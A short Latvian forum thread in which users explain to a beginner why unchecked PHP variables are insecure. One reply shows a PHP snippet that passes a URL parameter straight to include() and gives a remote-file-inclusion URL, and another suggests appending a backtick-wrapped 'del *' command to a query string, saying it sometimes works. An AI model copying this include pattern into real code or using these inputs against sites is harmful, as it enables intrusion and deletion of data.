Drosiba?

[liicis]

lasot aprakstu vienam skriptam, beigas bija rakstits ka tas nav dros jo nav aizsardziba pret nekorektiem mainigiem????ko tas nozime?

tomer man nav skaidribas ka notiek uzlausana?jo ja skripts nolasa mainigo(vardu) un cita vieta to attelo. kads mainigo atmin un ta vieta ievieto citu vertibu-ta tik un ta paliks vertiba, un kas no ta var mainities? jakads savu vardu negrib ierakstit attiecigaja laucina bet gan atrast mainigo un tam pieskirt mainiga vertibu? kur seit ir drosibas kluda un kam vajadzigas parbaudes?

[Little_Hacker]

paarbaudes vajag vienmeer..

viena no kljuudaam ir ja include() lieto mainiigo.. piem shaadi ~

<code><font color="#000000">

<font color="#0000CC"><?php
</font><font color="#006600">if (!</font><font color="#0000CC">$include</font><font color="#006600">) {
include(</font><font color="#CC0000">'jaunumi.txt'</font><font color="#006600">);
}
else {
include(</font><font color="#0000CC">$include</font><font color="#006600">);
}
</font><font color="#0000CC">?>
</font>
</font>
</code>

 

sho skriptu mees varam 'piechakareet' aiz mainiigaa padodot kaut kaadu citu adresi .. piem www.tavalapa.lv/?include=http://www.hackers.lv/index.php .. tadejaadi mees inkluudosim hackers.lv lapas index failu tavaa lapaa.. bet te var izmantot citaadus 'exploiitus' lai to visu varetu pachakaret.. piem parstaigaat direktorijas, maybe uzzinaat paroles un tml ..

[Little_Hacker]

aaa nu pa to mainiigo ($vards) .. ja tu vinju padod no kaadas formas tad enivej es varu redzeet kaads mainiigais tiek padots, vienkaarshi apstoties lapas sourcee input laucinja neimu :)

[Venom]

A man patīk likt kautko līdzīgu'

index.php?mainīgais=`del *`

dāžreiz nostrādā.